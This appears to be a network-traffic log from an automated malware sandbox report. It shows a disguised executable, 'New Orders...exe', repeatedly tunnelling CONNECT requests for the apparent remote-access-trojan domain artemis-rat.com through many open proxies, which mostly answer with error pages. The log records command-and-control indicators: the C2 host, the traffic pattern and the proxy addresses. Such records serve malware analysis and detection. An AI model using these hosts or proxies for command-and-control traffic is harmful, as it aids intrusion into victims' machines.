                                                                                        1547192.168.2.95414164.227.108.25319087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.601172924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1548192.168.2.954439111.90.150.10910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.601737976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1549192.168.2.954441185.220.226.1288087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.603061914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1550192.168.2.954475162.214.121.173525777672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.605235100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.164256096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.773540974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070430040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.460875034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.773334026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.164063931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.664241076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.663743973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1551192.168.2.954460129.213.150.20580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.606060982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1552192.168.2.954480162.214.225.223507537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.608336926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.221863031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.945494890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.133035898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.524277925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.835850000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.242115021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.861166000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.100545883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1553192.168.2.954422103.127.1.130807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.699574947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.088644028 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1554192.168.2.952952159.223.166.2151997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.702506065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.835876942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.839838028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.945307016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.038724899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1555192.168.2.95445646.17.63.166100007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.709498882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.006176949 CET339INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/4.7
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 5
                                                                                        X-Squid-Error: TCP_RESET 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from proxy.wakoopa.com
                                                                                        Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 72 65 73 65 74
                                                                                        Data Ascii: reset


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1556192.168.2.954454185.109.184.150560677672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.721282959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.476469040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.477627993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.380089998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1557192.168.2.954344117.160.250.13888997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.728665113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.263989925 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1558192.168.2.95450645.12.31.140807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.729198933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.883497000 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1559192.168.2.94987834.85.177.17031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.730851889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773422956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.773519993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.773859024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1560192.168.2.954446177.38.5.1641537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.733540058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1561192.168.2.95446961.111.38.5807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.740109921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.046947956 CET507INHTTP/1.1 502 Proxy Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 341
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1562192.168.2.954114163.172.166.35163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.756426096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.835973978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.839835882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.792932034 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
